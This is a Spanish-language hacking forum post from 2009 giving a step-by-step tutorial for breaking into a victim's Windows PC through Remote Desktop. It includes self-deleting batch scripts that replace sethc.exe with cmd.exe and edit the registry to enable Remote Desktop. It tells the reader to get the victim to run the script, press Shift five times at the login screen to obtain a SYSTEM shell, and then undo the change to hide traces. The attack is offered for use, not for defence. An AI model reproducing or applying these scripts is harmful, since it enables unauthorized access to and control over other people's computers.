AgustinKukuchka
Admin
Cantidad de envíos: 15
Fecha de inscripción: 10/10/2008
Edad: 18
 |  Tema: Hack por Escritorio Remoto de Windows  Dom Ago 09, 2009 2:26 am | |
| 1) Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto) abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):
2)Crear un batch que haga los siguiente:
| Código: | [color=black]echo off[/color][color=black]title .[/color][color=black]Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"[/color][color=black]Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"[/color][color=black]del %0[/color][color=black]exit[/color]
|
Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veces Shift. También es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrirá el paso y el batch se auto borrara.
2.1) Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.| Código: | [color=black]echo off[/color][color=black]title .[/color][color=black]cls[/color][color=black]Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"[/color][color=black]Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"[/color][color=black]reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f[/color][color=black]reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0[/color][color=black]del %0[/color][color=black]exit[/color]
|
[size=18]Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
"Escritorio Remoto de Windows" y nos abrirá el paso y el Batch se Auto borrara.
3) Luego abrimos Inicio/programas/Accesorios/comunicaciones/Conexión a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opción "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"
4)Luego click en conectar.
5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veces SHIFT y nos saldrá la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.
6) Ahora tenemos acceso a la raíz ósea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el Telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).
7) Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hice una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
| Código: | [color=black]copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"[/color][color=black]del[/color][color=black] "c:\windows\system32\setch.zzz"[/color]
|
Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano.[/size] |
|
